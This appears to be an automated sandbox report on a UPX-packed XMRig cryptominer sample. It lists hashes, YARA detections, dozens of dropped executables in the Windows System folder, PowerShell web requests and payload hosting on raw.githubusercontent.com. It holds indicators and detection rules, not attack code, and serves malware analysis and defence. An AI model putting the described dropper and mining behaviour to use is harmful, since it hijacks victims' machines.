xmrig | 4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a

Analysis

max time kernel
125s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
10/06/2024, 11:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
Size

3.1MB
MD5

7c261f24d3d56d7d095a674d0fe6ea6e
SHA1

74e6100ee379956cd6b8e0fecd1f669f6cc856ed
SHA256

4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a
SHA512

6f89a978c4f3e23ffb55a75d4ad110019445f5bced6d98e27738045c4d48733342ca923706871de105ff86d2d9646af925ea8e225586a060146057d3568650ca
SSDEEP

98304:71ONtyBeSFkXV1etEKLlWUTOfeiRA2R76zHrW5:7bBeSFk9

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects executables containing URLs to raw contents of a Github gist 64 IoCs

resource	yara_rule
behavioral2/memory/4584-0-0x00007FF65B740000-0x00007FF65BB36000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000800000002351d-5.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023522-7.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023521-11.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2292-17-0x00007FF7A48A0000-0x00007FF7A4C96000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023523-21.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023524-26.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023526-38.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023529-53.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002352c-74.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2920-99-0x00007FF730A00000-0x00007FF730DF6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2324-101-0x00007FF617BE0000-0x00007FF617FD6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2440-104-0x00007FF6FE4D0000-0x00007FF6FE8C6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4572-107-0x00007FF66C4D0000-0x00007FF66C8C6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2192-110-0x00007FF7DEDE0000-0x00007FF7DF1D6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1488-109-0x00007FF738920000-0x00007FF738D16000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2228-108-0x00007FF727BE0000-0x00007FF727FD6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/932-106-0x00007FF75AFB0000-0x00007FF75B3A6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4864-105-0x00007FF790250000-0x00007FF790646000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2720-103-0x00007FF6FAD30000-0x00007FF6FB126000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2196-102-0x00007FF7E2F50000-0x00007FF7E3346000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3748-100-0x00007FF61D400000-0x00007FF61D7F6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023530-98.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002352e-84.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002352f-83.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002352d-79.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002352b-69.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002352a-63.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023528-59.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023527-50.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3940-49-0x00007FF610130000-0x00007FF610526000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2160-44-0x00007FF79FB20000-0x00007FF79FF16000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023525-34.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3176-25-0x00007FF71F450000-0x00007FF71F846000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2860-8-0x00007FF7F36B0000-0x00007FF7F3AA6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023533-114.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2900-133-0x00007FF66B510000-0x00007FF66B906000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1440-148-0x00007FF6B8360000-0x00007FF6B8756000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3188-160-0x00007FF7535C0000-0x00007FF7539B6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002353c-175.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4940-184-0x00007FF6E1EF0000-0x00007FF6E22E6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1256-192-0x00007FF7FEFC0000-0x00007FF7FF3B6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002353d-194.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002353f-193.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002353b-190.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002353a-188.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002353e-183.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023539-181.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023536-173.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023535-171.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023538-169.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023537-177.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2096-163-0x00007FF778360000-0x00007FF778756000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0008000000023532-156.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023534-151.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000800000002351e-141.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0008000000023531-140.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1000-130-0x00007FF759820000-0x00007FF759C16000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4584-1550-0x00007FF65B740000-0x00007FF65BB36000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2292-1556-0x00007FF7A48A0000-0x00007FF7A4C96000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3176-1830-0x00007FF71F450000-0x00007FF71F846000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2860-1824-0x00007FF7F36B0000-0x00007FF7F3AA6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3940-2064-0x00007FF610130000-0x00007FF610526000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/932-2065-0x00007FF75AFB0000-0x00007FF75B3A6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL

UPX dump on OEP (original entry point) 64 IoCs

resource	yara_rule
behavioral2/memory/4584-0-0x00007FF65B740000-0x00007FF65BB36000-memory.dmp	UPX
behavioral2/files/0x000800000002351d-5.dat	UPX
behavioral2/files/0x0007000000023522-7.dat	UPX
behavioral2/files/0x0007000000023521-11.dat	UPX
behavioral2/memory/2292-17-0x00007FF7A48A0000-0x00007FF7A4C96000-memory.dmp	UPX
behavioral2/files/0x0007000000023523-21.dat	UPX
behavioral2/files/0x0007000000023524-26.dat	UPX
behavioral2/files/0x0007000000023526-38.dat	UPX
behavioral2/files/0x0007000000023529-53.dat	UPX
behavioral2/files/0x000700000002352c-74.dat	UPX
behavioral2/memory/2920-99-0x00007FF730A00000-0x00007FF730DF6000-memory.dmp	UPX
behavioral2/memory/2324-101-0x00007FF617BE0000-0x00007FF617FD6000-memory.dmp	UPX
behavioral2/memory/2440-104-0x00007FF6FE4D0000-0x00007FF6FE8C6000-memory.dmp	UPX
behavioral2/memory/4572-107-0x00007FF66C4D0000-0x00007FF66C8C6000-memory.dmp	UPX
behavioral2/memory/2192-110-0x00007FF7DEDE0000-0x00007FF7DF1D6000-memory.dmp	UPX
behavioral2/memory/1488-109-0x00007FF738920000-0x00007FF738D16000-memory.dmp	UPX
behavioral2/memory/2228-108-0x00007FF727BE0000-0x00007FF727FD6000-memory.dmp	UPX
behavioral2/memory/932-106-0x00007FF75AFB0000-0x00007FF75B3A6000-memory.dmp	UPX
behavioral2/memory/4864-105-0x00007FF790250000-0x00007FF790646000-memory.dmp	UPX
behavioral2/memory/2720-103-0x00007FF6FAD30000-0x00007FF6FB126000-memory.dmp	UPX
behavioral2/memory/2196-102-0x00007FF7E2F50000-0x00007FF7E3346000-memory.dmp	UPX
behavioral2/memory/3748-100-0x00007FF61D400000-0x00007FF61D7F6000-memory.dmp	UPX
behavioral2/files/0x0007000000023530-98.dat	UPX
behavioral2/files/0x000700000002352e-84.dat	UPX
behavioral2/files/0x000700000002352f-83.dat	UPX
behavioral2/files/0x000700000002352d-79.dat	UPX
behavioral2/files/0x000700000002352b-69.dat	UPX
behavioral2/files/0x000700000002352a-63.dat	UPX
behavioral2/files/0x0007000000023528-59.dat	UPX
behavioral2/files/0x0007000000023527-50.dat	UPX
behavioral2/memory/3940-49-0x00007FF610130000-0x00007FF610526000-memory.dmp	UPX
behavioral2/memory/2160-44-0x00007FF79FB20000-0x00007FF79FF16000-memory.dmp	UPX
behavioral2/files/0x0007000000023525-34.dat	UPX
behavioral2/memory/3176-25-0x00007FF71F450000-0x00007FF71F846000-memory.dmp	UPX
behavioral2/memory/2860-8-0x00007FF7F36B0000-0x00007FF7F3AA6000-memory.dmp	UPX
behavioral2/files/0x0007000000023533-114.dat	UPX
behavioral2/memory/2900-133-0x00007FF66B510000-0x00007FF66B906000-memory.dmp	UPX
behavioral2/memory/1440-148-0x00007FF6B8360000-0x00007FF6B8756000-memory.dmp	UPX
behavioral2/memory/3188-160-0x00007FF7535C0000-0x00007FF7539B6000-memory.dmp	UPX
behavioral2/files/0x000700000002353c-175.dat	UPX
behavioral2/memory/4940-184-0x00007FF6E1EF0000-0x00007FF6E22E6000-memory.dmp	UPX
behavioral2/memory/1256-192-0x00007FF7FEFC0000-0x00007FF7FF3B6000-memory.dmp	UPX
behavioral2/files/0x000700000002353d-194.dat	UPX
behavioral2/files/0x000700000002353f-193.dat	UPX
behavioral2/files/0x000700000002353b-190.dat	UPX
behavioral2/files/0x000700000002353a-188.dat	UPX
behavioral2/files/0x000700000002353e-183.dat	UPX
behavioral2/files/0x0007000000023539-181.dat	UPX
behavioral2/files/0x0007000000023536-173.dat	UPX
behavioral2/files/0x0007000000023535-171.dat	UPX
behavioral2/files/0x0007000000023538-169.dat	UPX
behavioral2/files/0x0007000000023537-177.dat	UPX
behavioral2/memory/2096-163-0x00007FF778360000-0x00007FF778756000-memory.dmp	UPX
behavioral2/files/0x0008000000023532-156.dat	UPX
behavioral2/files/0x0007000000023534-151.dat	UPX
behavioral2/files/0x000800000002351e-141.dat	UPX
behavioral2/files/0x0008000000023531-140.dat	UPX
behavioral2/memory/1000-130-0x00007FF759820000-0x00007FF759C16000-memory.dmp	UPX
behavioral2/memory/4584-1550-0x00007FF65B740000-0x00007FF65BB36000-memory.dmp	UPX
behavioral2/memory/2292-1556-0x00007FF7A48A0000-0x00007FF7A4C96000-memory.dmp	UPX
behavioral2/memory/3176-1830-0x00007FF71F450000-0x00007FF71F846000-memory.dmp	UPX
behavioral2/memory/2860-1824-0x00007FF7F36B0000-0x00007FF7F3AA6000-memory.dmp	UPX
behavioral2/memory/3940-2064-0x00007FF610130000-0x00007FF610526000-memory.dmp	UPX
behavioral2/memory/932-2065-0x00007FF75AFB0000-0x00007FF75B3A6000-memory.dmp	UPX

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/memory/4584-0-0x00007FF65B740000-0x00007FF65BB36000-memory.dmp	xmrig
behavioral2/files/0x000800000002351d-5.dat	xmrig
behavioral2/files/0x0007000000023522-7.dat	xmrig
behavioral2/files/0x0007000000023521-11.dat	xmrig
behavioral2/memory/2292-17-0x00007FF7A48A0000-0x00007FF7A4C96000-memory.dmp	xmrig
behavioral2/files/0x0007000000023523-21.dat	xmrig
behavioral2/files/0x0007000000023524-26.dat	xmrig
behavioral2/files/0x0007000000023526-38.dat	xmrig
behavioral2/files/0x0007000000023529-53.dat	xmrig
behavioral2/files/0x000700000002352c-74.dat	xmrig
behavioral2/memory/2920-99-0x00007FF730A00000-0x00007FF730DF6000-memory.dmp	xmrig
behavioral2/memory/2324-101-0x00007FF617BE0000-0x00007FF617FD6000-memory.dmp	xmrig
behavioral2/memory/2440-104-0x00007FF6FE4D0000-0x00007FF6FE8C6000-memory.dmp	xmrig
behavioral2/memory/4572-107-0x00007FF66C4D0000-0x00007FF66C8C6000-memory.dmp	xmrig
behavioral2/memory/2192-110-0x00007FF7DEDE0000-0x00007FF7DF1D6000-memory.dmp	xmrig
behavioral2/memory/1488-109-0x00007FF738920000-0x00007FF738D16000-memory.dmp	xmrig
behavioral2/memory/2228-108-0x00007FF727BE0000-0x00007FF727FD6000-memory.dmp	xmrig
behavioral2/memory/932-106-0x00007FF75AFB0000-0x00007FF75B3A6000-memory.dmp	xmrig
behavioral2/memory/4864-105-0x00007FF790250000-0x00007FF790646000-memory.dmp	xmrig
behavioral2/memory/2720-103-0x00007FF6FAD30000-0x00007FF6FB126000-memory.dmp	xmrig
behavioral2/memory/2196-102-0x00007FF7E2F50000-0x00007FF7E3346000-memory.dmp	xmrig
behavioral2/memory/3748-100-0x00007FF61D400000-0x00007FF61D7F6000-memory.dmp	xmrig
behavioral2/files/0x0007000000023530-98.dat	xmrig
behavioral2/files/0x000700000002352e-84.dat	xmrig
behavioral2/files/0x000700000002352f-83.dat	xmrig
behavioral2/files/0x000700000002352d-79.dat	xmrig
behavioral2/files/0x000700000002352b-69.dat	xmrig
behavioral2/files/0x000700000002352a-63.dat	xmrig
behavioral2/files/0x0007000000023528-59.dat	xmrig
behavioral2/files/0x0007000000023527-50.dat	xmrig
behavioral2/memory/3940-49-0x00007FF610130000-0x00007FF610526000-memory.dmp	xmrig
behavioral2/memory/2160-44-0x00007FF79FB20000-0x00007FF79FF16000-memory.dmp	xmrig
behavioral2/files/0x0007000000023525-34.dat	xmrig
behavioral2/memory/3176-25-0x00007FF71F450000-0x00007FF71F846000-memory.dmp	xmrig
behavioral2/memory/2860-8-0x00007FF7F36B0000-0x00007FF7F3AA6000-memory.dmp	xmrig
behavioral2/files/0x0007000000023533-114.dat	xmrig
behavioral2/memory/2900-133-0x00007FF66B510000-0x00007FF66B906000-memory.dmp	xmrig
behavioral2/memory/1440-148-0x00007FF6B8360000-0x00007FF6B8756000-memory.dmp	xmrig
behavioral2/memory/3188-160-0x00007FF7535C0000-0x00007FF7539B6000-memory.dmp	xmrig
behavioral2/files/0x000700000002353c-175.dat	xmrig
behavioral2/memory/4940-184-0x00007FF6E1EF0000-0x00007FF6E22E6000-memory.dmp	xmrig
behavioral2/memory/1256-192-0x00007FF7FEFC0000-0x00007FF7FF3B6000-memory.dmp	xmrig
behavioral2/files/0x000700000002353d-194.dat	xmrig
behavioral2/files/0x000700000002353f-193.dat	xmrig
behavioral2/files/0x000700000002353b-190.dat	xmrig
behavioral2/files/0x000700000002353a-188.dat	xmrig
behavioral2/files/0x000700000002353e-183.dat	xmrig
behavioral2/files/0x0007000000023539-181.dat	xmrig
behavioral2/files/0x0007000000023536-173.dat	xmrig
behavioral2/files/0x0007000000023535-171.dat	xmrig
behavioral2/files/0x0007000000023538-169.dat	xmrig
behavioral2/files/0x0007000000023537-177.dat	xmrig
behavioral2/memory/2096-163-0x00007FF778360000-0x00007FF778756000-memory.dmp	xmrig
behavioral2/files/0x0008000000023532-156.dat	xmrig
behavioral2/files/0x0007000000023534-151.dat	xmrig
behavioral2/files/0x000800000002351e-141.dat	xmrig
behavioral2/files/0x0008000000023531-140.dat	xmrig
behavioral2/memory/1000-130-0x00007FF759820000-0x00007FF759C16000-memory.dmp	xmrig
behavioral2/memory/4584-1550-0x00007FF65B740000-0x00007FF65BB36000-memory.dmp	xmrig
behavioral2/memory/2292-1556-0x00007FF7A48A0000-0x00007FF7A4C96000-memory.dmp	xmrig
behavioral2/memory/3176-1830-0x00007FF71F450000-0x00007FF71F846000-memory.dmp	xmrig
behavioral2/memory/2860-1824-0x00007FF7F36B0000-0x00007FF7F3AA6000-memory.dmp	xmrig
behavioral2/memory/3940-2064-0x00007FF610130000-0x00007FF610526000-memory.dmp	xmrig
behavioral2/memory/932-2065-0x00007FF75AFB0000-0x00007FF75B3A6000-memory.dmp	xmrig

Blocklisted process makes network request 6 IoCs

flow	pid	Process
10	3248	powershell.exe
12	3248	powershell.exe
16	3248	powershell.exe
17	3248	powershell.exe
19	3248	powershell.exe
23	3248	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3248	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
2860	ZqckURU.exe
2292	AkomxfY.exe
3176	EczyVzf.exe
2160	atYsBlU.exe
4572	tyGiabL.exe
2228	pYPZLlZ.exe
3940	vWPiBwM.exe
2920	vEsShlp.exe
1488	nnJVWjo.exe
3748	JTihoMm.exe
2324	uYwdnRX.exe
2196	jBZuCFz.exe
2720	EPYIRte.exe
2440	sbfuIaD.exe
4864	DPrQitL.exe
932	WpGPEiA.exe
2192	RcWyYWd.exe
1000	arfZdck.exe
1440	DhtnDba.exe
3188	mjMfxce.exe
2900	ntWukxU.exe
1256	cGfOJgU.exe
2096	KWjfKRS.exe
4940	PWnXZhu.exe
1840	uopfwFE.exe
2696	TOXQnzM.exe
4992	lsMKahp.exe
1804	NEEHabY.exe
1852	xaNIySo.exe
5064	MxwbGeB.exe
4048	dHOwczS.exe
1144	SjRBIRs.exe
2924	CcttmCl.exe
3008	lMiblVa.exe
5088	DTzetmc.exe
3312	fzYSJUt.exe
2800	vPlczqn.exe
2072	vNCbtNb.exe
2724	RMUvZEa.exe
380	sogRRSj.exe
2248	kzfBfEo.exe
3840	oHsUzyt.exe
3164	bUJayta.exe
4724	pzfqRtq.exe
540	ZckglTY.exe
692	TSETXEa.exe
3728	XJDyenz.exe
2844	PrVNzNt.exe
3488	gDwnpUR.exe
2328	BQDFPvL.exe
3800	NWANbnv.exe
2768	rBFWpgu.exe
3304	ubMBFzl.exe
60	TxeweMT.exe
4388	EBCdjuc.exe
1704	TPiZDeA.exe
5144	ONzucxH.exe
5172	ByvINog.exe
5196	VvITouM.exe
5220	uaiiAKl.exe
5244	lcPbdrq.exe
5268	ZvHtKuI.exe
5292	zDtPraw.exe
5316	jlzrHvr.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4584-0-0x00007FF65B740000-0x00007FF65BB36000-memory.dmp	upx
behavioral2/files/0x000800000002351d-5.dat	upx
behavioral2/files/0x0007000000023522-7.dat	upx
behavioral2/files/0x0007000000023521-11.dat	upx
behavioral2/memory/2292-17-0x00007FF7A48A0000-0x00007FF7A4C96000-memory.dmp	upx
behavioral2/files/0x0007000000023523-21.dat	upx
behavioral2/files/0x0007000000023524-26.dat	upx
behavioral2/files/0x0007000000023526-38.dat	upx
behavioral2/files/0x0007000000023529-53.dat	upx
behavioral2/files/0x000700000002352c-74.dat	upx
behavioral2/memory/2920-99-0x00007FF730A00000-0x00007FF730DF6000-memory.dmp	upx
behavioral2/memory/2324-101-0x00007FF617BE0000-0x00007FF617FD6000-memory.dmp	upx
behavioral2/memory/2440-104-0x00007FF6FE4D0000-0x00007FF6FE8C6000-memory.dmp	upx
behavioral2/memory/4572-107-0x00007FF66C4D0000-0x00007FF66C8C6000-memory.dmp	upx
behavioral2/memory/2192-110-0x00007FF7DEDE0000-0x00007FF7DF1D6000-memory.dmp	upx
behavioral2/memory/1488-109-0x00007FF738920000-0x00007FF738D16000-memory.dmp	upx
behavioral2/memory/2228-108-0x00007FF727BE0000-0x00007FF727FD6000-memory.dmp	upx
behavioral2/memory/932-106-0x00007FF75AFB0000-0x00007FF75B3A6000-memory.dmp	upx
behavioral2/memory/4864-105-0x00007FF790250000-0x00007FF790646000-memory.dmp	upx
behavioral2/memory/2720-103-0x00007FF6FAD30000-0x00007FF6FB126000-memory.dmp	upx
behavioral2/memory/2196-102-0x00007FF7E2F50000-0x00007FF7E3346000-memory.dmp	upx
behavioral2/memory/3748-100-0x00007FF61D400000-0x00007FF61D7F6000-memory.dmp	upx
behavioral2/files/0x0007000000023530-98.dat	upx
behavioral2/files/0x000700000002352e-84.dat	upx
behavioral2/files/0x000700000002352f-83.dat	upx
behavioral2/files/0x000700000002352d-79.dat	upx
behavioral2/files/0x000700000002352b-69.dat	upx
behavioral2/files/0x000700000002352a-63.dat	upx
behavioral2/files/0x0007000000023528-59.dat	upx
behavioral2/files/0x0007000000023527-50.dat	upx
behavioral2/memory/3940-49-0x00007FF610130000-0x00007FF610526000-memory.dmp	upx
behavioral2/memory/2160-44-0x00007FF79FB20000-0x00007FF79FF16000-memory.dmp	upx
behavioral2/files/0x0007000000023525-34.dat	upx
behavioral2/memory/3176-25-0x00007FF71F450000-0x00007FF71F846000-memory.dmp	upx
behavioral2/memory/2860-8-0x00007FF7F36B0000-0x00007FF7F3AA6000-memory.dmp	upx
behavioral2/files/0x0007000000023533-114.dat	upx
behavioral2/memory/2900-133-0x00007FF66B510000-0x00007FF66B906000-memory.dmp	upx
behavioral2/memory/1440-148-0x00007FF6B8360000-0x00007FF6B8756000-memory.dmp	upx
behavioral2/memory/3188-160-0x00007FF7535C0000-0x00007FF7539B6000-memory.dmp	upx
behavioral2/files/0x000700000002353c-175.dat	upx
behavioral2/memory/4940-184-0x00007FF6E1EF0000-0x00007FF6E22E6000-memory.dmp	upx
behavioral2/memory/1256-192-0x00007FF7FEFC0000-0x00007FF7FF3B6000-memory.dmp	upx
behavioral2/files/0x000700000002353d-194.dat	upx
behavioral2/files/0x000700000002353f-193.dat	upx
behavioral2/files/0x000700000002353b-190.dat	upx
behavioral2/files/0x000700000002353a-188.dat	upx
behavioral2/files/0x000700000002353e-183.dat	upx
behavioral2/files/0x0007000000023539-181.dat	upx
behavioral2/files/0x0007000000023536-173.dat	upx
behavioral2/files/0x0007000000023535-171.dat	upx
behavioral2/files/0x0007000000023538-169.dat	upx
behavioral2/files/0x0007000000023537-177.dat	upx
behavioral2/memory/2096-163-0x00007FF778360000-0x00007FF778756000-memory.dmp	upx
behavioral2/files/0x0008000000023532-156.dat	upx
behavioral2/files/0x0007000000023534-151.dat	upx
behavioral2/files/0x000800000002351e-141.dat	upx
behavioral2/files/0x0008000000023531-140.dat	upx
behavioral2/memory/1000-130-0x00007FF759820000-0x00007FF759C16000-memory.dmp	upx
behavioral2/memory/4584-1550-0x00007FF65B740000-0x00007FF65BB36000-memory.dmp	upx
behavioral2/memory/2292-1556-0x00007FF7A48A0000-0x00007FF7A4C96000-memory.dmp	upx
behavioral2/memory/3176-1830-0x00007FF71F450000-0x00007FF71F846000-memory.dmp	upx
behavioral2/memory/2860-1824-0x00007FF7F36B0000-0x00007FF7F3AA6000-memory.dmp	upx
behavioral2/memory/3940-2064-0x00007FF610130000-0x00007FF610526000-memory.dmp	upx
behavioral2/memory/932-2065-0x00007FF75AFB0000-0x00007FF75B3A6000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
9	raw.githubusercontent.com
10	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\ByvINog.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\acSxtxw.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\YSrIQqa.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\PIJRCSx.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\XYKejtJ.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\mEdDYNx.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\YuzpOpq.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\WEyOUsn.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\spODgAl.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\VQSZqwq.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\FXqNJju.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\IPjtoob.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\JQQAKSi.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\lnBslEy.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\ZvXpaJX.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\qSkpGxS.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\utCJpKe.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\epfxciI.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\NYXVTMi.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\LfSEpiC.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\YwBNmto.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\smjTIvc.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\mLLZTyZ.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\apWluFg.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\DluXaMV.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\DhYkIgD.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
File created	C:\Windows\System\wEwEynE.exe	4b4b90d4d895957ec471c4b3eb562386bf526ffe7128330ddff22b10077ece1a.exe
